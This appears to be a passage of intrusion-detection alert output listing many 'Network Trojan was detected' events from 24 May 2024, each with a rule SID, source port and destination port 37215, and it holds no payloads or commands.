              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624123
              SID:2835222
              Source Port:59368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857153
              SID:2829579
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633621
              SID:2835222
              Source Port:53152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099241
              SID:2835222
              Source Port:59006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823347
              SID:2829579
              Source Port:53346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208294
              SID:2829579
              Source Port:52468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597728
              SID:2829579
              Source Port:51466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534385
              SID:2829579
              Source Port:59578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341224
              SID:2835222
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576456
              SID:2829579
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251618
              SID:2829579
              Source Port:33730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064604
              SID:2829579
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065765
              SID:2835222
              Source Port:44020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483159
              SID:2835222
              Source Port:39296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858930
              SID:2829579
              Source Port:33244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432384
              SID:2829579
              Source Port:34472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287964
              SID:2835222
              Source Port:49272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518935
              SID:2829579
              Source Port:56702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574781
              SID:2829579
              Source Port:52534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164552
              SID:2829579
              Source Port:60564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726788
              SID:2829579
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866272
              SID:2829579
              Source Port:54078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.974283
              SID:2835222
              Source Port:35226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254262
              SID:2835222
              Source Port:55134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860045
              SID:2835222
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421617
              SID:2835222
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061425
              SID:2835222
              Source Port:60874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147097
              SID:2835222
              Source Port:46984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457723
              SID:2835222
              Source Port:45192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799004
              SID:2835222
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634678
              SID:2835222
              Source Port:40732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663682
              SID:2835222
              Source Port:41692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696065
              SID:2829579
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921301
              SID:2829579
              Source Port:38636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545530
              SID:2835222
              Source Port:48964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057205
              SID:2835222
              Source Port:40038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372062
              SID:2835222
              Source Port:49378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418941
              SID:2835222
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063837
              SID:2829579
              Source Port:41558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460550
              SID:2835222
              Source Port:43068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629579
              SID:2835222
              Source Port:53556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570673
              SID:2829579
              Source Port:53400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245450
              SID:2835222
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724489
              SID:2835222
              Source Port:59960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545331
              SID:2829579
              Source Port:42972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641024
              SID:2829579
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148814
              SID:2835222
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076304
              SID:2829579
              Source Port:53414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.584797
              SID:2835222
              Source Port:38966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055379
              SID:2829579
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308541
              SID:2835222
              Source Port:53064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447835
              SID:2829579
              Source Port:57452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062843
              SID:2835222
              Source Port:33154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727614
              SID:2835222
              Source Port:46086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451162
              SID:2829579
              Source Port:49510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764526
              SID:2829579
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547067
              SID:2835222
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681075
              SID:2835222
              Source Port:33564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858452
              SID:2829579
              Source Port:56160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832466
              SID:2829579
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130269
              SID:2829579
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600241
              SID:2829579
              Source Port:36706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973801
              SID:2829579
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574049
              SID:2829579
              Source Port:49102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308562
              SID:2829579
              Source Port:50114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568687
              SID:2829579
              Source Port:59722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430703
              SID:2829579
              Source Port:44658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125178
              SID:2829579
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872428
              SID:2829579
              Source Port:43368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117898
              SID:2835222
              Source Port:47630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594760
              SID:2835222
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970606
              SID:2835222
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099259
              SID:2835222
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856789
              SID:2829579
              Source Port:36762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727268
              SID:2835222
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474623
              SID:2835222
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210267
              SID:2835222
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801930
              SID:2835222
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097241
              SID:2835222
              Source Port:46774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549159
              SID:2829579
              Source Port:36440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991982
              SID:2835222
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519152
              SID:2835222
              Source Port:45220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532318
              SID:2829579
              Source Port:43014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575241
              SID:2835222
              Source Port:40020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575251
              SID:2835222
              Source Port:49988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123161
              SID:2829579
              Source Port:56648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825676
              SID:2829579
              Source Port:47344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857428
              SID:2829579
              Source Port:47804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284003
              SID:2829579
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433415
              SID:2829579
              Source Port:47030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979771
              SID:2829579
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573333
              SID:2829579
              Source Port:42516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449869
              SID:2835222
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394462
              SID:2835222
              Source Port:39014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596070
              SID:2835222
              Source Port:60792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750492
              SID:2835222
              Source Port:34100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749028
              SID:2829579
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991108
              SID:2829579
              Source Port:33672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148916
              SID:2829579
              Source Port:40890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108676
              SID:2829579
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246079
              SID:2835222
              Source Port:52904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365372
              SID:2829579
              Source Port:53590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358888
              SID:2835222
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289303
              SID:2829579
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061002
              SID:2835222
              Source Port:35006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343660
              SID:2829579
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279997
              SID:2835222
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599224
              SID:2829579
              Source Port:52890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920881
              SID:2835222
              Source Port:51170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054381
              SID:2829579
              Source Port:41998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575203
              SID:2829579
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459554
              SID:2829579
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568664
              SID:2835222
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078697
              SID:2835222
              Source Port:35072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250872
              SID:2835222
              Source Port:60980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693182
              SID:2835222
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622831
              SID:2829579
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122022
              SID:2835222
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547866
              SID:2835222
              Source Port:47320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246136
              SID:2829579
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502949
              SID:2835222
              Source Port:47352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165100
              SID:2835222
              Source Port:52160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967419
              SID:2829579
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878221
              SID:2835222
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572030
              SID:2829579
              Source Port:56316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859611
              SID:2829579
              Source Port:54112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550630
              SID:2829579
              Source Port:49100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693403
              SID:2829579
              Source Port:44530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186560
              SID:2835222
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543525
              SID:2835222
              Source Port:35952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054164
              SID:2829579
              Source Port:49482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340906
              SID:2835222
              Source Port:45404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460567
              SID:2835222
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149007
              SID:2829579
              Source Port:43234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148540
              SID:2835222
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505617
              SID:2829579
              Source Port:47176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857870
              SID:2835222
              Source Port:36042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801787
              SID:2835222
              Source Port:35070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589127
              SID:2829579
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186545
              SID:2829579
              Source Port:55356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920659
              SID:2835222
              Source Port:50834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151228
              SID:2835222
              Source Port:35524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061576
              SID:2829579
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456814
              SID:2835222
              Source Port:32976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802624
              SID:2835222
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048987
              SID:2835222
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441181
              SID:2829579
              Source Port:46952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127539
              SID:2829579
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112718
              SID:2835222
              Source Port:51858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867949
              SID:2835222
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764373
              SID:2829579
              Source Port:54358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544309
              SID:2835222
              Source Port:53058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575180
              SID:2835222
              Source Port:40776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477293
              SID:2829579
              Source Port:60918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425913
              SID:2835222
              Source Port:34084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432368
              SID:2835222
              Source Port:40306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394086
              SID:2829579
              Source Port:46602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445247
              SID:2829579
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102947
              SID:2835222
              Source Port:40680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595545
              SID:2835222
              Source Port:33652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540582
              SID:2829579
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970912
              SID:2829579
              Source Port:54538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505505
              SID:2835222
              Source Port:54790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769210
              SID:2829579
              Source Port:47260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404657
              SID:2829579
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575585
              SID:2835222
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885856
              SID:2829579
              Source Port:45388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553602
              SID:2829579
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747570
              SID:2835222
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061812
              SID:2829579
              Source Port:41978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693136
              SID:2835222
              Source Port:51792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061919
              SID:2829579
              Source Port:41878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111461
              SID:2829579
              Source Port:48252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662642
              SID:2829579
              Source Port:42692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449984
              SID:2835222
              Source Port:42422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684840
              SID:2835222
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187998
              SID:2829579
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269928
              SID:2835222
              Source Port:59430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536641
              SID:2829579
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598165
              SID:2829579
              Source Port:50718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205134
              SID:2829579
              Source Port:43024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598111
              SID:2835222
              Source Port:39844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703434
              SID:2829579
              Source Port:51664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119955
              SID:2829579
              Source Port:57138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231619
              SID:2835222
              Source Port:37384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394887
              SID:2829579
              Source Port:56280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445274
              SID:2829579
              Source Port:41128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537645
              SID:2829579
              Source Port:51228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099814
              SID:2835222
              Source Port:49246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279179
              SID:2829579
              Source Port:54444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503141
              SID:2835222
              Source Port:58804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.699473
              SID:2835222
              Source Port:43934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634116
              SID:2829579
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681000
              SID:2835222
              Source Port:59276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501689
              SID:2829579
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596476
              SID:2829579
              Source Port:59300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248861
              SID:2835222
              Source Port:49996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
